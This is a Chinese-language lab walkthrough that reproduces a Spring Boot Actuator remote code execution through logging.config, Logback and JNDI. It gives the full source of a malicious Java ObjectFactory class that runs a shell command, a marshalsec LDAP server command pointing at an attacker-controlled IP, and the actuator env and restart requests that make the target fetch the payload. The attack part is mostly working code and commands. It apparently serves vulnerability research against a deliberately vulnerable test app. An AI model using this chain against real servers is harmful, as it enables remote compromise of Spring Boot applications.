restart logging.config logback JNDI RCE
漏洞环境:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce
漏洞复现:
-
在 VPS 上用
python3 -m http.server 80命令开启 WEB 服务 -
编写实现 ObjectFactory 接口的恶意类,并上传至 VPS WEB 根目录
import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import javax.naming.Context; import javax.naming.Name; import java.io.File; import java.io.IOException; import java.util.Hashtable;public class CommandRaw extends AbstractTranslet implements javax.naming.spi.ObjectFactory{ private static String cmd = "calc.exe";public CommandRaw() { String[] var1;var1 = new String[]{ "cmd", "/C", cmd};try { Runtime.getRuntime().exec(var1);} catch (IOException var3) { var3.printStackTrace();}}public void transform(DOM var1, SerializationHandler[] var2) throws TransletException { }public void transform(DOM var1, DTMAxisIterator var2, SerializationHandler var3) throws TransletException { }@Overridepublic Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { return new Object();} } -
用
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.137.204.238:80/#CommandRaw 1389命令在 VPS 上开启 LDAP 服务 -
访问
actuator/env接口修改logging.config属性值http://127.0.0.1:9098/actuator/restart application/json{"name":"logging.config","value":"http://10.137.204.238/example02.xml"} -
访问
actuator/restart接口重启应用http://127.0.0.1:9098/actuator/restart application/json
漏洞原理:
通过访问 actuator/env 接口修改 logging.config 属性值,logging.config 属性值指定 Logback 组件的日志配置文件位置,然后重启应用触发目标访问搭建好的恶意 LDAP 服务,造成 LDAP 注入,跟 jolokia logback JNDI RCE 其实大差不差
注意点:
- 恶意类需要实现 ObjectFactory 接口
- VPS 上的 xml 文件内容语法不能为畸形,否则服务器会异常退出
Referenct:
https://github.com/LandGrey/SpringBootVulExploit